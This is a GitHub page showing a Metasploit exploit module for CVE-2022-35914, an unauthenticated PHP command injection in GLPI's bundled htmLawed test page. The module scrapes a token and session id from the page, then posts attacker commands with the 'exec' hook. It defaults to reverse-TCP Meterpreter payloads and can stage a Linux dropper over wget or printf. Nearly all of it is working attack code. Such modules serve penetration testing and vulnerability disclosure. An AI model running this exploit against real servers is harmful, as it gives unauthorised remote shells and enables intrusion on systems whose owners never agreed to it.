-
Notifications
You must be signed in to change notification settings - Fork 13.7k
/
glpi_htmlawed_php_injection.rb
136 lines (125 loc) · 3.9 KB
/
glpi_htmlawed_php_injection.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'GLPI htmLawed php command injection',
'Description' => %q{
This exploit takes advantage of a unauthenticated php command injection available
from GLPI versions 10.0.2 and below to execute a command.
},
'License' => MSF_LICENSE,
'Author' => [
'cosad3s', # PoC https://github.com/cosad3s/CVE-2022-35914-poc
'bwatters-r7' # module
],
'References' => [
['CVE', '2022-35914' ],
['URL', 'https://github.com/cosad3s/CVE-2022-35914-poc']
],
'Platform' => 'linux',
'Arch' => [ARCH_X64, ARCH_CMD],
'CmdStagerFlavor' => [ 'printf', 'wget' ],
'Targets' => [
[
'Nix Command',
{
'Platform' => [ 'unix', 'linux' ],
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',
'RPORT' => 80
}
}
],
[
'Linux (Dropper)',
{
'Platform' => 'linux',
'Arch' => [ARCH_X64],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'RPORT' => 80
},
'Type' => :linux_dropper
}
]
],
'DisclosureDate' => '2022-01-26',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
}
)
)
register_options(
[
Msf::OptString.new('TARGET_URI', [ false, 'URI where glpi is hosted', '/glpi'])
]
)
end
def populate_values
uri = "#{datastore['TARGET_URI']}/vendor/htmlawed/htmlawed/htmLawedTest.php"
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri),
'connection' => 'keep-alive',
'accept' => '*/*'
})
@html = res.get_html_document
@token = @html.at_xpath('//input[@id="token"]')['value']
vprint_status("token = #{@token}")
# sometimes I got > 1 sid. We must use the last one.
@sid = res.get_cookies.match(/.*=(.*?);.*/)[1]
vprint_status("sid = #{@sid}")
rescue NoMethodError => e
elog('Failed to retrieve token or sid', error: e)
end
end
def execute_command(cmd, _opts = {})
populate_values if @sid.nil? || @token.nil?
uri = datastore['TARGET_URI'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php'
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri),
'cookie' => 'sid=' + @sid,
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => true,
'vars_post' => {
'token' => @token,
'text' => cmd,
'hhook' => 'exec',
'sid' => @sid
}
})
end
def check
populate_values if @html_doc.nil?
if @token.nil? || @sid.nil? || @html.nil?
return Exploit::CheckCode::Safe('Failed to retrieve htmLawed page')
end
return Exploit::CheckCode::Appears if @html.to_s.include?('htmLawed')
return Exploit::CheckCode::Safe('Unable to determine htmLawed status')
end
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end
end